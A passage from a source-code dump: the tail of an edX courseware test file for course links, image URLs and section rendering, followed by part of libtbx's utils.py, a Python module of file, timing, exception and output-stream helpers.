TEST_DATA_MOCK_MODULESTORE, TEST_DATA_MIXED_TOY_MODULESTORE
)
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.tests.xml import factories as xml
from xmodule.tests.xml import XModuleXmlImportTest
CMS_BASE_TEST = 'testcms'
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
class CoursesTest(ModuleStoreTestCase):
"""Test methods related to fetching courses."""
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
def test_get_cms_course_block_link(self):
"""
Tests that get_cms_course_link_by_id and get_cms_block_link_by_id return the right thing
"""
self.course = CourseFactory.create(
org='org', number='num', display_name='name'
)
cms_url = u"//{}/course/org/num/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_course_link(self.course))
cms_url = u"//{}/course/i4x://org/num/course/name".format(CMS_BASE_TEST)
self.assertEqual(cms_url, get_cms_block_link(self.course, 'course'))
class ModuleStoreBranchSettingTest(ModuleStoreTestCase):
"""Test methods related to the modulestore branch setting."""
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='preview.localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_preview_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), ModuleStoreEnum.Branch.draft_preferred)
@mock.patch(
'xmodule.modulestore.django.get_current_request_hostname',
mock.Mock(return_value='localhost')
)
@override_settings(
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS={r'preview\.': ModuleStoreEnum.Branch.draft_preferred},
MODULESTORE_BRANCH='fake_default_branch',
)
def test_default_modulestore_branch_mapping(self):
self.assertEqual(store_django._get_modulestore_branch_setting(), 'fake_default_branch')
@override_settings(
MODULESTORE=TEST_DATA_MOCK_MODULESTORE, CMS_BASE=CMS_BASE_TEST
)
class MongoCourseImageTestCase(ModuleStoreTestCase):
"""Tests for course image URLs when using a mongo modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = CourseFactory.create(org='edX', course='999')
self.assertEquals(course_image_url(course), '/c4x/edX/999/asset/{0}'.format(course.course_image))
def test_non_ascii_image_name(self):
# Verify that non-ascii image names are cleaned
course = CourseFactory.create(course_image=u'before_\N{SNOWMAN}_after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before___after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_spaces_in_image_name(self):
# Verify that image names with spaces in them are cleaned
course = CourseFactory.create(course_image=u'before after.jpg')
self.assertEquals(
course_image_url(course),
'/c4x/{org}/{course}/asset/before_after.jpg'.format(
org=course.location.org,
course=course.location.course
)
)
def test_static_asset_path_course_image_default(self):
"""
Test that without course_image being set, but static_asset_path
being set that we get the right course_image url.
"""
course = CourseFactory.create(static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/images/course_image.jpg'
)
def test_static_asset_path_course_image_set(self):
"""
Test that with course_image and static_asset_path both
being set, that we get the right course_image url.
"""
course = CourseFactory.create(course_image=u'things_stuff.jpg',
static_asset_path="foo")
self.assertEquals(
course_image_url(course),
'/static/foo/things_stuff.jpg'
)
class XmlCourseImageTestCase(XModuleXmlImportTest):
"""Tests for course image URLs when using an xml modulestore."""
def test_get_image_url(self):
"""Test image URL formatting."""
course = self.process_xml(xml.CourseFactory.build())
self.assertEquals(course_image_url(course), '/static/xml_test_course/images/course_image.jpg')
def test_non_ascii_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before_\N{SNOWMAN}_after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before_\N{SNOWMAN}_after.jpg')
def test_spaces_in_image_name(self):
course = self.process_xml(xml.CourseFactory.build(course_image=u'before after.jpg'))
self.assertEquals(course_image_url(course), u'/static/xml_test_course/before after.jpg')
@override_settings(MODULESTORE=TEST_DATA_MOCK_MODULESTORE)
class CoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content."""
# TODO: this test relies on the specific setup of the toy course.
# It should be rewritten to build the course it needs and then test that.
def setUp(self):
"""
Set up the course and user context
"""
super(CoursesRenderTest, self).setUp()
store = store_django.modulestore()
course_items = import_from_xml(store, self.user.id, TEST_DATA_DIR, ['toy'])
course_key = course_items[0].id
self.course = get_course_by_id(course_key)
self.request = get_request_for_user(UserFactory.create())
def test_get_course_info_section_render(self):
# Test render works okay
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertEqual(course_info, u"<a href='/c4x/edX/toy/asset/handouts_sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(self.request, self.course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
@mock.patch('courseware.courses.get_request_for_thread')
def test_get_course_about_section_render(self, mock_get_request):
mock_get_request.return_value = self.request
# Test render works okay
course_about = get_course_about_section(self.course, 'short_description')
self.assertEqual(course_about, "A course about toys.")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_about = get_course_about_section(self.course, 'short_description')
self.assertIn("this module is temporarily unavailable", course_about)
@override_settings(MODULESTORE=TEST_DATA_MIXED_TOY_MODULESTORE)
class XmlCoursesRenderTest(ModuleStoreTestCase):
"""Test methods related to rendering courses content for an XML course."""
toy_course_key = SlashSeparatedCourseKey('edX', 'toy', '2012_Fall')
def test_get_course_info_section_render(self):
course = get_course_by_id(self.toy_course_key)
request = get_request_for_user(UserFactory.create())
# Test render works okay. Note the href is different in XML courses.
course_info = get_course_info_section(request, course, 'handouts')
self.assertEqual(course_info, "<a href='/static/toy/handouts/sample_handout.txt'>Sample</a>")
# Test when render raises an exception
with mock.patch('courseware.courses.get_module') as mock_module_render:
mock_module_render.return_value = mock.MagicMock(
render=mock.Mock(side_effect=Exception('Render failed!'))
)
course_info = get_course_info_section(request, course, 'handouts')
self.assertIn("this module is temporarily unavailable", course_info)
| agpl-3.0 |
hickerson/bbn | fable/fable_sources/libtbx/utils.py | 1 | 43577 | from __future__ import division
from libtbx.queuing_system_utils import sge_utils, pbs_utils
from libtbx.str_utils import show_string
try: import gzip
except ImportError: gzip = None
try: import bz2
except ImportError: bz2 = None
try:
import hashlib
hashlib_md5 = hashlib.md5
except ImportError:
import md5
hashlib_md5 = md5.new
from stdlib import math
import warnings
import shutil
import glob
import time
import atexit
import traceback
import re
import sys, os
op = os.path
windows_device_names = """\
CON PRN AUX NUL COM1 COM2 COM3 COM4 COM5 COM6 COM7 COM8 COM9
LPT1 LPT2 LPT3 LPT4 LPT5 LPT6 LPT7 LPT8 LPT9""".split()
def xfrange(start, stop=None, step=None, tolerance=None):
"""A float range generator."""
if stop is None:
stop = start + 0.0
start = 0.0
else:
start += 0.0 # force it to be a float
if step is None:
step = 1.0
else:
assert step != 0.0
count = int(math.ceil((stop - start) / step))
if ( tolerance is not None
and abs(start + count * step - stop) < abs(step * tolerance)):
count += 1
for i in xrange(count):
yield start + i * step
def frange(start, stop=None, step=None):
return list(xfrange(start, stop=stop, step=step))
def xsamples(start, stop=None, step=None, tolerance=1e-6):
return xfrange(start, stop, step, tolerance)
def samples(start, stop=None, step=None, tolerance=1e-6):
return list(xsamples(start, stop, step, tolerance))
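# Usage sketch (illustrative; not part of the original module):
#   list(xfrange(0, 1, 0.25)) -> [0.0, 0.25, 0.5, 0.75]
#   frange(3) -> [0.0, 1.0, 2.0] (stop-only form, like range())
#   samples(0, 1, 0.25) -> [0.0, 0.25, 0.5, 0.75, 1.0]
# The tolerance used by samples() makes an end point that is a whole number
# of steps away inclusive, unlike the plain frange() above.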
def escape_sh_double_quoted(s):
"the result is supposed to be double-quoted when passed to sh"
if (s is None): return None
return s.replace('\\','\\\\').replace('"','\\"')
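# Illustrative example (not part of the original module): backslashes and
# double quotes are escaped so the result can be embedded in a double-quoted
# sh argument, e.g. escape_sh_double_quoted('say "hi"') == 'say \\"hi\\"'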
def xlen(seq):
if (seq is None): return seq
return len(seq)
def product(seq):
result = None
for val in seq:
if (result is None):
result = val
else:
result *= val
return result
def sequence_index_dict(seq, must_be_unique=True):
result = {}
for i,elem in enumerate(seq):
if (must_be_unique): assert elem not in result
result[elem] = i
return result
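# Usage sketch (illustrative; not part of the original module):
#   sequence_index_dict(["a", "b", "c"]) -> {"a": 0, "b": 1, "c": 2}
# With must_be_unique=True (the default) a repeated element trips the assert.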
def number_from_string(string):
# similar to libtbx.phil.number_from_value_string
# (please review if making changes here)
if (string.lower() in ["true", "false"]):
raise ValueError(
'Error interpreting "%s" as a numeric expression.' % string)
try: return int(string)
except KeyboardInterrupt: raise
except Exception: pass
try: return eval(string, math.__dict__, {})
except KeyboardInterrupt: raise
except Exception:
raise ValueError(
'Error interpreting "%s" as a numeric expression: %s' % (
string, format_exception()))
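# Usage sketch (illustrative; not part of the original module): plain integers
# come back as int, other strings are evaluated with the math module in scope,
# and boolean-looking strings are rejected up front:
#   number_from_string("7") -> 7
#   number_from_string("2*pi") -> 6.283185307179586
#   number_from_string("true") -> raises ValueError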
def gzip_open(file_name, mode):
assert mode in ["r", "rb", "w", "wb", "a", "ab"]
if (gzip is None):
un = ""
if (mode[0] == "r"): un = "un"
raise RuntimeError(
"gzip module not available: cannot %scompress file %s"
% (un, show_string(file_name)))
return gzip.open(file_name, mode)
def bz2_open(file_name, mode):
assert mode in ('r', 'w')
if bz2 is None:
raise RuntimeError('bz2 module not available: cannot %scompress file %s'
% ({'r':'un', 'w':''}[mode], file_name))
return bz2.BZ2File(file_name, mode)
def warn_if_unexpected_md5_hexdigest(
path,
expected_md5_hexdigests,
hints=[],
out=None):
m = hashlib_md5()
m.update("\n".join(open(path).read().splitlines()))
current_md5_hexdigest = m.hexdigest()
if (m.hexdigest() in expected_md5_hexdigests): return False
warning = "Warning: unexpected md5 hexdigest:"
file_name = " File: %s" % show_string(path)
new_hexdigest = " New md5 hexdigest: %s" % m.hexdigest()
width = max([len(s) for s in [warning, file_name, new_hexdigest]])
if (out is None): out = sys.stdout
print >> out, "*"*width
print >> out, warning
print >> out, file_name
print >> out, new_hexdigest
for hint in hints:
print >> out, hint
print >> out, "*"*width
return True
def get_memory_from_string(mem_str):
if type(mem_str)==type(1): return mem_str
if type(mem_str)==type(1.): return mem_str
mem_str = mem_str.replace(" ","").strip().upper()
if mem_str == "": return 0
factor=1024
for i, greek in enumerate(["K","M","G","T","E","Z","Y"]):
num_str=None
if mem_str[-1]==greek:
num_str = mem_str[:-1]
if mem_str.find("%sB" % greek)==len(mem_str)-2:
num_str = mem_str[:-2]
if num_str is not None:
try:
num = float(num_str)
except ValueError, e:
raise RuntimeError("""
The numerical portion of %s is not a valid float
""" % mem_str)
break
factor*=1024
else:
try:
num = int(mem_str)
except ValueError, e:
raise RuntimeError("""
There is no memory unit or valid float in %s
""" % mem_str)
factor=1
return num*factor
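# Usage sketch (illustrative; not part of the original module): suffixes are
# binary multiples and a bare number is returned unscaled:
#   get_memory_from_string("2K") -> 2048.0
#   get_memory_from_string("1GB") -> 1073741824.0
#   get_memory_from_string("512") -> 512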
def getenv_bool(variable_name, default=False):
value = os.environ.get(variable_name, None)
if (value is None): return default
value_lower = value.lower()
if (value_lower not in ["false", "true", "0", "1"]):
raise Sorry(
'Environment variable %s must be "True", "False", "0", or "1"'
' (current value: "%s").' % (variable_name, value))
return (value_lower in ["true", "1"])
def file_size(file_name):
return os.stat(file_name).st_size
def copy_file(source, target, compress=None):
assert op.isfile(source)
if (op.isdir(target)):
target = op.join(target, op.basename(source))
if (compress is None):
t = open(target, "wb")
else:
assert compress == ".gz"
t = gzip_open(file_name=target+compress, mode="wb")
t.write(open(source, "rb").read())
del t
def remove_files(pattern=None, paths=None, ensure_success=True):
assert [pattern, paths].count(None) == 1
if (paths is None):
paths = glob.glob(pattern)
for path in paths:
if (ensure_success):
if (op.exists(path)):
os.remove(path)
if (op.exists(path)):
raise RuntimeError("Cannot remove file: %s" % show_string(path))
else:
if (op.isfile(path)):
os.remove(path)
def find_files (dir_name, pattern="*", files_only=True) :
assert os.path.isdir(dir_name) and (pattern is not None)
regex = re.compile(pattern)
files = os.listdir(dir_name)
matching_files = []
for file_name in files :
full_path = os.path.join(dir_name, file_name)
if (files_only) and (not os.path.isfile(full_path)) :
continue
if (regex.search(file_name) is not None) :
matching_files.append(full_path)
return matching_files
def sort_files_by_mtime (file_names=None, dir_name=None, reverse=False) :
assert ([file_names, dir_name].count(None) == 1)
if (dir_name is not None) :
assert os.path.isdir(dir_name)
file_names = [ os.path.join(dir_name, fn) for fn in os.listdir(dir_name) ]
files_and_mtimes = []
for file_name in file_names :
files_and_mtimes.append((file_name, os.path.getmtime(file_name)))
files_and_mtimes.sort(lambda x,y: cmp(x[1], y[1]))
if (reverse) :
files_and_mtimes.reverse()
return [ file_name for file_name, mtime in files_and_mtimes ]
def tupleize(x):
try:
return tuple(x)
except KeyboardInterrupt: raise
except Exception:
return (x,)
def plural_s(n, suffix="s"):
if (n == 1): return n, ""
return n, suffix
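# Usage sketch (illustrative; not part of the original module), convenient
# with %-formatting:
#   "%d file%s" % plural_s(1) -> "1 file"
#   "%d file%s" % plural_s(3) -> "3 files"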
def n_dim_index_from_one_dim(i1d, sizes):
assert len(sizes) > 0
result = []
for sz in reversed(sizes):
assert sz > 0
result.append(i1d % sz)
i1d //= sz
result.reverse()
return result
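# Usage sketch (illustrative; not part of the original module): converts a
# flat, row-major index back into an n-dimensional index:
#   n_dim_index_from_one_dim(13, (2, 3, 4)) -> [1, 0, 1]
# since 13 == 1*(3*4) + 0*4 + 1.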
def flat_list(nested_list):
result = []
if (hasattr(nested_list, "__len__")):
for sub_list in nested_list:
result.extend(flat_list(sub_list))
else:
result.append(nested_list)
return result
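# Usage sketch (illustrative; not part of the original module):
#   flat_list([[1, [2, 3]], 4]) -> [1, 2, 3, 4]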
def select_matching(key, choices, default=None):
for key_pattern, value in choices:
m = re.search(key_pattern, key)
if m is not None: return value
return default
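# Usage sketch (illustrative; not part of the original module): the first
# pattern that re.search() finds in the key wins:
#   select_matching("model.pdb",
#                   [(r"\.pdb$", "pdb"), (r"\.cif$", "cif")],
#                   default="unknown") -> "pdb"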
class Keep: pass
class Sorry(Exception):
"""
Basic exception type for user errors; the traceback will be suppressed.
"""
__orig_module__ = __module__
# trick to get just "Sorry" instead of "libtbx.utils.Sorry"
__module__ = Exception.__module__
def reset_module (self) :
self.__class__.__module__ = self.__class__.__orig_module__
disable_tracebacklimit = "LIBTBX_DISABLE_TRACEBACKLIMIT" in os.environ
__prev_excepthook = sys.excepthook
def sorry_excepthook(type, value, traceback):
tb_off = (not disable_tracebacklimit and isinstance(value, Sorry))
if (tb_off):
class __not_set(object): pass
prev_tracebacklimit = getattr(sys, "tracebacklimit", __not_set)
sys.tracebacklimit = 0
result = __prev_excepthook(type, value, traceback)
if (tb_off):
if (prev_tracebacklimit is __not_set):
del sys.tracebacklimit
else:
sys.tracebacklimit = prev_tracebacklimit
return result
sys.excepthook = sorry_excepthook
class Usage(Sorry):
"""
Subclass of Sorry, for printing out usage instructions upon program
invocation without arguments (or --help, etc.).
"""
__module__ = Exception.__module__
class Abort(Sorry) :
"""
Subclass of Sorry, primarily used in the Phenix GUI in response to user
input.
"""
__module__ = Exception.__module__
class Failure(Sorry) :
__module__ = Exception.__module__
def detect_multiprocessing_problem():
vers_info = sys.version_info[:2]
if (vers_info < (2,6)):
return "multiprocessing module not available:" \
" Python 2.6 or higher is required" \
" (version currently in use: %d.%d)" % vers_info
import libtbx.load_env
if (libtbx.env.has_module("omptbx")) :
import omptbx
if (omptbx.omp_version is not None) :
return "multiprocessing is not compatible with OpenMP"
sem_open_msg = "This platform lacks a functioning sem_open implementation"
pool = None
try:
try:
import multiprocessing
pool = multiprocessing.Pool(processes=2)
pool.map(func=abs, iterable=range(2), chunksize=1)
except ImportError, e:
if (not str(e).startswith(sem_open_msg)):
raise
return "multiprocessing import error: " + sem_open_msg
finally:
if (pool is not None):
pool.close()
pool.join()
return None
def if_none(value, default):
if (value is None): return default
return value
def format_exception():
ei = sys.exc_info()
type_ = ei[0].__name__
value = str(ei[1])
if (value != ""):
value = value.replace(" (<string>, line ", " (line ")
else:
file_name, line = traceback.extract_tb(sys.exc_info()[2], 1)[0][:2]
if (file_name is not None):
value = file_name+" "
if (line is not None):
value += "line %d" % line
return ("%s: %s" % (type_, value)).rstrip()
def show_exception_info_if_full_testing(prefix="EXCEPTION_INFO: "):
import libtbx.load_env
if ( not libtbx.env.full_testing
and not disable_tracebacklimit):
return
from libtbx import introspection
from cStringIO import StringIO
sio = StringIO()
introspection.show_stack(out=sio)
traceback.print_exc(file=sio)
msg = "\n".join([prefix+line for line in sio.getvalue().splitlines()]) + "\n"
del sio
done = []
for out in [sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__]:
def is_done():
for o in done:
if (o is out): return True
return False
if (is_done()): continue
out.write(msg)
flush = getattr(out, "flush", None)
if (flush is not None): flush()
done.append(out)
return msg
def base36_encode(integer, width=None):
digit_set = "0123456789abcdefghijklmnopqrstuvwxyz"
digits = []
while (integer != 0):
integer, i = divmod(integer, 36)
digits.append(digit_set[i])
if (width is not None):
while (len(digits) < width):
digits.append("0")
digits.reverse()
return "".join(digits)
def base36_timestamp(seconds_since_epoch=None, multiplier=1000, width=10):
s = seconds_since_epoch
if (s is None):
s = time.time()
return base36_encode(integer=int(s * multiplier + 0.5), width=width)
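def _demo_base36():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): shows base-36 encoding and the padded timestamp built on it.
  assert base36_encode(36) == "10"
  assert base36_encode(36, width=4) == "0010"
  print base36_timestamp()  # 10-character code derived from the current time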
def date_and_time():
seconds_since_epoch = time.time()
localtime = time.localtime(seconds_since_epoch)
if (time.daylight and localtime[8] != 0):
tzname = time.tzname[1]
offs = -time.altzone
else:
tzname = time.tzname[0]
offs = -time.timezone
return time.strftime("Date %Y-%m-%d Time %H:%M:%S", localtime) \
+ " %s %+03d%02d (%.2f s)" % (
tzname, offs//3600, offs//60%60, seconds_since_epoch)
class timer_base(object):
def __init__(self):
self.t = self.get()
def elapsed(self):
t = self.get()
d = t - self.t
return d
def delta(self):
t = self.get()
d = t - self.t
self.t = t
return d
def show_elapsed(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.elapsed()
def show_delta(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.delta()
class user_plus_sys_time(timer_base):
def get(self):
t = os.times()
return t[0] + t[1]
class wall_clock_time(timer_base):
""" motivation: when running multithreaded code, user_plus_sys_time
would report the cumulated times for all threads: not very useful
to analyse the scaling with the number of threads! Wall clock time, although
it is less reliable is the only solution in that case """
def get(self):
return time.time()
class time_log(object):
def __init__(self, label, use_wall_clock=False):
self.label = label
self.use_wall_clock = use_wall_clock
self.accumulation = 0
self.n = 0
self.delta = 0
self.timer = None
def start(self):
if (self.use_wall_clock):
self.timer = wall_clock_time()
else:
self.timer = user_plus_sys_time()
return self
def stop(self):
self.delta = self.timer.delta()
self.timer = None
self.accumulation += self.delta
self.n += 1
def average(self):
return self.accumulation / max(1,self.n)
def log(self):
self.stop()
return self.report()
def log_elapsed(self, local_label):
return "time_log: %s: %.2f elapsed %s" % (
self.label, self.timer.elapsed(), local_label)
legend = "time_log: label: n accumulation delta average"
def report(self):
assert self.timer is None
return "time_log: %s: %d %.2f %.3g %.3g" % (
self.label, self.n, self.accumulation,
self.delta, self.average())
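def _demo_time_log():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): accumulate timings over repeated calls, then print the report.
  tl = time_log(label="example")
  for unused in range(3):
    tl.start()
    sum(xrange(100000))  # stand-in workload
    tl.stop()
  print tl.legend
  print tl.report()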
def human_readable_time(time_in_seconds):
time_units = time_in_seconds
time_unit = "seconds"
if (time_units > 120):
time_units /= 60
time_unit = "minutes"
if (time_units > 120):
time_units /= 60
time_unit = "hours"
if (time_units > 48):
time_units /= 24
time_unit = "days"
return time_units, time_unit
def human_readable_time_as_seconds(time_units, time_unit):
if (isinstance(time_units, str)): time_units = float(time_units)
if (time_unit == "seconds"): return time_units
if (time_unit == "minutes"): return time_units*60
if (time_unit == "hours"): return time_units*60*60
if (time_unit == "days"): return time_units*60*60*24
raise RuntimeError("Unknown time_unit: %s" % time_unit)
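def _demo_human_readable_time():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): 90000 seconds collapses to 25 hours; the inverse converts back.
  units, unit = human_readable_time(90000)
  assert (units, unit) == (25, "hours")
  assert human_readable_time_as_seconds(units, unit) == 90000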
def format_timestamp_12_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return replace_with
elif short :
return time.strftime("%d-%m-%y %I:%M %p", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %I:%M %p", time.localtime(float(unix_time)))
def format_timestamp_24_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return "unknown"
elif short :
return time.strftime("%d-%m-%y %H:%M", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %H:%M", time.localtime(float(unix_time)))
format_timestamp = format_timestamp_12_hour
def format_cpu_times(show_micro_seconds_per_tick=True):
t = os.times()
result = "u+s,u,s: %.2f %.2f %.2f" % (t[0] + t[1], t[0], t[1])
if (show_micro_seconds_per_tick):
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
result += " micro-seconds/tick: %.3f" % ((t[0]+t[1])/python_ticker*1.e6)
return result
def show_total_time(
out=None,
show_micro_seconds_per_bytecode_instruction=True):
if (out == None): out = sys.stdout
total_time = user_plus_sys_time().get()
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
print >> out, "Time per interpreted Python bytecode instruction:",
print >> out, "%.3f micro seconds" % (total_time / python_ticker * 1.e6)
print >> out, "Total CPU time: %.2f %s" % human_readable_time(total_time)
def show_wall_clock_time(seconds, out=None):
if (out is None): out = sys.stdout
print >> out, "wall clock time:",
if (seconds < 120):
print >> out, "%.2f seconds" % seconds
else:
m = int(seconds / 60 + 1.e-6)
s = seconds - m * 60
print >> out, "%d minutes %.2f seconds (%.2f seconds total)" % (
m, s, seconds)
out_flush = getattr(out, "flush", None)
if (out_flush is not None):
out_flush()
class show_times:
def __init__(self, time_start=None, out=None):
if (time_start is None):
t = os.times()
self.time_start = time.time() - (t[0] + t[1])
elif (time_start == "now"):
self.time_start = time.time()
else:
self.time_start = -(0-time_start) # be sure time_start is a number
self.out = out
def __call__(self):
out = self.out
if (out is None): out = sys.stdout
t = os.times()
usr_plus_sys = t[0] + t[1]
try: ticks = sys.gettickeraccumulation()
except AttributeError: ticks = None
s = "usr+sys time: %.2f seconds" % usr_plus_sys
if (ticks is not None):
s += ", ticks: %d" % ticks
if (ticks != 0):
s += ", micro-seconds/tick: %.3f" % (usr_plus_sys*1.e6/ticks)
print >> out, s
show_wall_clock_time(seconds=time.time()-self.time_start, out=out)
def show_times_at_exit(time_start=None, out=None):
atexit.register(show_times(time_start=time_start, out=out))
class host_and_user:
def __init__(self):
self.host = os.environ.get("HOST")
self.hostname = os.environ.get("HOSTNAME")
self.computername = os.environ.get("COMPUTERNAME")
self.hosttype = os.environ.get("HOSTTYPE")
self.processor_architecture = os.environ.get("PROCESSOR_ARCHITECTURE")
self.machtype = os.environ.get("MACHTYPE")
self.ostype = os.environ.get("OSTYPE")
self.vendor = os.environ.get("VENDOR")
self.user = os.environ.get("USER")
self.username = os.environ.get("USERNAME")
self.homedir = None
if (os.name == "nt") :
homedrive = os.environ.get("HOMEDRIVE")
homepath = os.environ.get("HOMEPATH")
if (not None in [homedrive, homepath]) :
self.homedir = os.path.join(homedrive, homepath)
else :
self.homedir = os.environ.get("HOME")
getpid = getattr(os, "getpid", None)
if (getpid is None):
self.pid = None
else:
self.pid = getpid()
self.sge_info = sge_utils.info()
self.pbs_info = pbs_utils.chunk_info()
def get_user_name (self) :
if (self.user is not None) :
return self.user
else :
return self.username
def get_host_name (self) :
if (self.host is not None) :
return self.host
elif (self.hostname is not None) :
return self.hostname
elif (self.computername is not None) :
return self.computername
return None
def show(self, out=None, prefix=""):
if (out is None): out = sys.stdout
if (self.host is not None):
print >> out, prefix + "HOST =", self.host
if ( self.hostname is not None
and self.hostname != self.host):
print >> out, prefix + "HOSTNAME =", self.hostname
if ( self.computername is not None
and self.computername != self.host):
print >> out, prefix + "COMPUTERNAME =", self.computername
if (self.hosttype is not None):
print >> out, prefix + "HOSTTYPE =", self.hosttype
if (self.processor_architecture is not None):
print >> out, prefix + "PROCESSOR_ARCHITECTURE =", \
self.processor_architecture
if ( self.hosttype is None
or self.machtype is None
or self.ostype is None
or "-".join([self.machtype, self.ostype]) != self.hosttype):
if (self.machtype is not None):
print >> out, prefix + "MACHTYPE =", \
self.machtype
if (self.ostype is not None):
print >> out, prefix + "OSTYPE =", \
self.ostype
if (self.vendor is not None and self.vendor != "unknown"):
print >> out, prefix + "VENDOR =", \
self.vendor
if (self.user is not None):
print >> out, prefix + "USER =", self.user
if ( self.username is not None
and self.username != self.user):
print >> out, prefix + "USERNAME =", self.username
if (self.pid is not None):
print >> out, prefix + "PID =", self.pid
self.sge_info.show(out=out, prefix=prefix)
self.pbs_info.show(out=out, prefix=prefix)
def allow_delete_directory (target_dir) :
"""
Check for specified reserved directories which are standard on many systems;
these should never be deleted as part of any program.
"""
homedir = host_and_user().homedir
safe_dirs = [
homedir,
os.path.join(homedir, "Documents"),
os.path.join(homedir, "Desktop"),
os.path.join(homedir, "Downloads"),
os.path.join(homedir, "Library"),
os.path.join(homedir, "Movies"),
os.path.join(homedir, "data"),
"/",
"/home",
"/Users",
]
target_dir = os.path.abspath(target_dir)
for safe_dir in safe_dirs :
if (target_dir == safe_dir) :
return False
return True
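def _demo_allow_delete_directory():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): reserved locations are refused, scratch directories allowed.
  assert not allow_delete_directory("/")
  print allow_delete_directory("/tmp/my_scratch_dir")  # hypothetical path; True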
def _indentor_write_loop(write_method, indent, incomplete_line, lines):
for line in lines:
if (len(line) == 0):
incomplete_line = False
elif (incomplete_line):
write_method(line)
incomplete_line = False
else:
write_method(indent)
write_method(line)
write_method("\n")
class indentor(object):
def __init__(self, file_object=None, indent="", parent=None):
if (file_object is None):
if (parent is None):
file_object = sys.stdout
else:
file_object = parent.file_object
self.file_object = file_object
if (hasattr(self.file_object, "flush")):
self.flush = self._flush
self.indent = indent
self.parent = parent
self.incomplete_line = False
def write(self, block):
if (len(block) == 0): return
if (block.endswith("\n")):
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=block.splitlines())
self.incomplete_line = False
else:
lines = block.splitlines()
if (len(lines) == 1):
if (self.incomplete_line):
self.file_object.write(lines[-1])
else:
self.file_object.write(self.indent + lines[-1])
else:
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=lines[:-1])
self.file_object.write(self.indent + lines[-1])
self.incomplete_line = True
def _flush(self):
self.file_object.flush()
def shift_right(self, indent=" "):
return self.__class__(indent=self.indent+indent, parent=self)
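def _demo_indentor():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): nested writers prepend increasing indentation to each line.
  out = indentor()
  out.write("section\n")
  out.shift_right().write("first line\nsecond line\n")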
class buffered_indentor(indentor):
def __init__(self, file_object=None, indent="", parent=None):
indentor.__init__(self, file_object, indent, parent)
self.buffer = []
def write(self, block):
self.buffer.append(block)
def write_buffer(self):
if (self.parent is not None):
self.parent.write_buffer()
for block in self.buffer:
indentor.write(self, block)
self.buffer = []
class null_out(object):
"""Pseudo-filehandle for suppressing printed output."""
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): pass
def writelines(self, sequence): pass
class raise_if_output(object):
"example use: sys.stdout = raise_if_output()"
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): raise RuntimeError
def writelines(self, sequence): raise RuntimeError
class multi_out(object):
"""
Multiplexing output stream, e.g. for simultaneously printing to stdout
and a logfile.
"""
def __init__(self):
self.labels = []
self.file_objects = []
self.atexit_send_to = []
self.closed = False
self.softspace = 0
atexit.register(self._atexit)
def _atexit(self):
if (not self.closed):
for f,a in zip(self.file_objects, self.atexit_send_to):
if (a is not None): a.write(f.getvalue())
def register(self, label, file_object, atexit_send_to=None):
"""Adds an output stream to the list."""
assert not self.closed
self.labels.append(label)
self.file_objects.append(file_object)
self.atexit_send_to.append(atexit_send_to)
return self
def replace_stringio(self,
old_label,
new_label,
new_file_object,
new_atexit_send_to=None):
i = self.labels.index(old_label)
old_file_object = self.file_objects[i]
new_file_object.write(old_file_object.getvalue())
old_file_object.close()
self.labels[i] = new_label
self.file_objects[i] = new_file_object
self.atexit_send_to[i] = new_atexit_send_to
def isatty(self):
return False
def close(self):
for file_object in self.file_objects:
if (file_object is sys.__stdout__): continue
if (file_object is sys.__stderr__): continue
file_object.close()
self.closed = True
def flush(self):
for file_object in self.file_objects:
flush = getattr(file_object, "flush", None)
if (flush is not None): flush()
def write(self, str):
for file_object in self.file_objects:
file_object.write(str)
def writelines(self, sequence):
for file_object in self.file_objects:
file_object.writelines(sequence)
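def _demo_multi_out():
  # Illustrative usage sketch (added for clarity; not part of the original
  # module): echo everything written to both stdout and an in-memory log.
  from cStringIO import StringIO
  log = multi_out().register("stdout", sys.stdout).register("log", StringIO())
  print >> log, "hello"
  log.flush()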
